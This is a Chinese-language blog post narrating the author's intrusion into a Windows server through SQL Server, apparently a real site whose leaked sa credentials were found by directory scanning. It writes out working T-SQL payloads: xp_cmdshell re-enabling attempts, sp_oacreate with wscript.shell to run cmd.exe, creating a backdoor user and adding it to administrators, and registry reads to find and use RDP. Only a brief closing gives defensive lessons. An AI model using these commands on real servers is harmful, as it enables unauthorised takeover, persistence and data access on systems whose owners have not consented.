介绍
SQL Server 也称Mssql Server,是微软家的数据库,常见于操作系统是Windows Server的服务器上
SQL Server的默认超级管理员是sa,在早期版本中,SQL Server的权限非常大,是SYSTEM权限
sa用户不仅能修改所有数据库的内容,还能直接对windows的注册表进行修改,执行命令等
渗透过程
获取数据库密码
通过SQL Server提权渗透,需要数据库的账号密码,不巧的是,我在扫描网站的目录时。发现了一处信息泄露,泄露的SQL Server的用户和密码,更巧的是这个网站使用的是sa用户,还告诉了我SQL Server的IP端口,于是我尝试连接,成功连上数据库。

执行命令
成功连上数据库,基本上就一半成功了,接下来尝试执行命令

尝试xp_cmdshell
尝试直接执行命令
exec master..xp_cmdshell 'whoami'
失败,尝试启用xp_cmdshel
- 确认
xp_cmdshell是否存在select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_oacreate';
结果为1,则证明存在 - 使用
xp_cmdshell执行命令,发现报错
xp_cmdshell存在,却无法执行命令,我当时怀疑是xplog70.dll被删了,xp_cmdshell是通过xplog70.dll来执行命令的 - 尝试重新启用
xp_cmdshell,结果命令结果告诉我xp_cmdshell不存在,在高级配置选项里也没有。
- 于是我又尝试重新加载
xp_cmdshell,dbcc addextendedproc("xp_cmdshell","xplog70.dll");
结果告诉我数据库中已存在名为 'xp_cmdshell' 的对象。
既然已经存在,那我就删了再重建

结果删都不让我删
我当时这个人直接傻掉,第一次遇到这种情况,存在又不存在的'xp_cmdshell'
sp_oacreate
于是xp_cmdshell没法用,我尝试使用sp_oacreate提权
- 尝试用系统
wscript.shell来执行系统命令declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net users > F:\tmp\1.txt'执行
net user命令,并将命令的结果写入网站目录下1.txt文件中,通过浏览器访问该文件,获取命令回显
访问文件,发现命令执行成功
- 创建用户,添加用户到
administrators组declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user abcd 123456 /add' exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators abcd /add' - 查看远程桌面服务是否启动
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server' ,'fDenyTSConnections'0表示开启
- 获取远程桌面端口
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
- 用windows自带的远程桌面连接成功连上服务器

发现了这电脑上存在杀软,居然是电脑管家。。。
翻看日志,发现我用 'xp_cmdshell' 执行的命令被这电脑管家拦截了。。。

总结
- 数据库的管理员账号不要使用于生产环境,一旦成功登录,基本上就离控住你电脑不远了
- 记得清理网站目录下的文件,防止被利用
- 腾讯电脑管家用处不大,但总比裸奔好

Comments NOTHING